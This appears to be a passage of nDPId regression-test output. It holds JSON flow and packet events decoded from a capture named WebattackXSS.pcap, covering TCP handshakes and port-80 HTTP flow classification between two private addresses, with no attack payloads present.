-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":3,"flow_last_seen":1499347257225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347257225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MIVAAD4GlVOsEAABwKgKMtfiAFCgDzIq5j1EfIAQAOVN2AAAAQEICgE6Aq0D49Qj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2421,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347258474,"flow_last_seen":1499347258474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347258474,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2421,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1499347258474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347258474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87xpAAD4G1rWsEAABwKgKMtfwAFBQ0ez\/AAAAAKACchBD0wAAAgQFtAQCCAoBOgPlAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1499347258474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347258474,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1\/Cr4O+wUNHtAKAScSDP4AAAAgQFtAQCCAoD49VcAToD5QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1499347258474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347258474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07xtAAD4G1rysEAABwKgKMtfwAFBQ0e0Aq+DvsYAQAOVu5wAAAQEICgE6A+YD49Vc"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347259759,"flow_last_seen":1499347259759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347259759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1499347259759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347259759,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xl9AAD4GZ3GsEAABwKgKMtf+AFDARlt4AAAAAKACchBklQAAAgQFtAQCCAoBOgUnAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":2,"flow_last_seen":1499347259759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347259759,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1\/6Hgb3OwEZbeaAScSBFowAAAgQFtAQCCAoD49adAToFJwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":3,"flow_last_seen":1499347259760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347259760,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XmBAAD4GZ3isEAABwKgKMtf+AFDARlt5h4G9z4AQAOXkqgAAAQEICgE6BScD49ad"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347262289,"flow_last_seen":1499347262289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1499347262289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347262289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ic9AAD4GPAGsEAABwKgKMtgYAFBS2I5QAAAAAKACchCcmQAAAgQFtAQCCAoBOgefAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":2,"flow_last_seen":1499347262289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347262289,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2BhB\/tqnUtiOUaAScSCj2QAAAgQFtAQCCAoD49kVAToHnwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":3,"flow_last_seen":1499347262290,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347262290,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0idBAAD4GPAisEAABwKgKMtgYAFBS2I5RQf7aqIAQAOVC4QAAAQEICgE6B58D49kV"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347263542,"flow_last_seen":1499347263542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347263542,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1499347263542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347263542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDNAAD4GcZ2sEAABwKgKMtgmAFA8SlzqAAAAAKACchDjRQAAAgQFtAQCCAoBOgjZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":1499347263542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347263542,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2CaW4NetPEpc66AScSCXYwAAAgQFtAQCCAoD49pPAToI2QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":3,"flow_last_seen":1499347263543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347263543,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDRAAD4GcaSsEAABwKgKMtgmAFA8SlzrluDXroAQAOU2awAAAQEICgE6CNkD49pP"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347264804,"flow_last_seen":1499347264804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347264804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1499347264804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347264804,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NPtAAD4GkNWsEAABwKgKMtg0AFDy7j7vAAAAAKACchBJUwAAAgQFtAQCCAoBOgoUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1499347264805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347264805,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2DSLlcK98u4+8KAScSAccQAAAgQFtAQCCAoD49uKAToKFAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1499347264805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347264805,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NPxAAD4GkNysEAABwKgKMtg0AFDy7j7wi5XCvoAQAOW7eAAAAQEICgE6ChQD49uK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347266097,"flow_last_seen":1499347266097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347266097,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1499347266097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347266097,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FmFAAD4Gr2+sEAABwKgKMthCAFDvjR02AAAAAKACchBtHAAAAgQFtAQCCAoBOgtXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2488,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1499347266098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347266098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ELPgbsz740dN6AScSAClAAAAgQFtAQCCAoD49zOAToLVwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1499347266098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347266098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FmJAAD4Gr3asEAABwKgKMthCAFDvjR03z4G7NIAQAOWhmgAAAQEICgE6C1gD49zO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347267376,"flow_last_seen":1499347267376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347267376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1499347267376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347267376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/BAAD4GSeCsEAABwKgKMthQAFA8R3dnAAAAAKACchDE4wAAAgQFtAQCCAoBOgyXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1499347267376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347267376,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2FDz+hz2PEd3aKAScSDS4AAAAgQFtAQCCAoD494NAToMlwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2498,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":3,"flow_last_seen":1499347267377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347267377,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/FAAD4GSeesEAABwKgKMthQAFA8R3do8\/oc94AQAOVx6AAAAQEICgE6DJcD494N"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347268659,"flow_last_seen":1499347268659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347268659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1499347268659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347268659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83S9AAD4G6KCsEAABwKgKMtheAFDSkdD3AAAAAKACchDTuQAAAgQFtAQCCAoBOg3YAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1499347268659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347268659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2F43lkso0pHQ+KAScSBuqAAAAgQFtAQCCAoD499OAToN2AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1499347268659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347268659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TBAAD4G6KesEAABwKgKMtheAFDSkdD4N5ZLKYAQAOUNsAAAAQEICgE6DdgD499O"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347271162,"flow_last_seen":1499347271162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347271162,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1499347271162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347271162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86ilAAD4G26asEAABwKgKMth4AFDbDvpjAAAAAKACchCfRAAAAgQFtAQCCAoBOhBKAAAAAAEDAwc="} 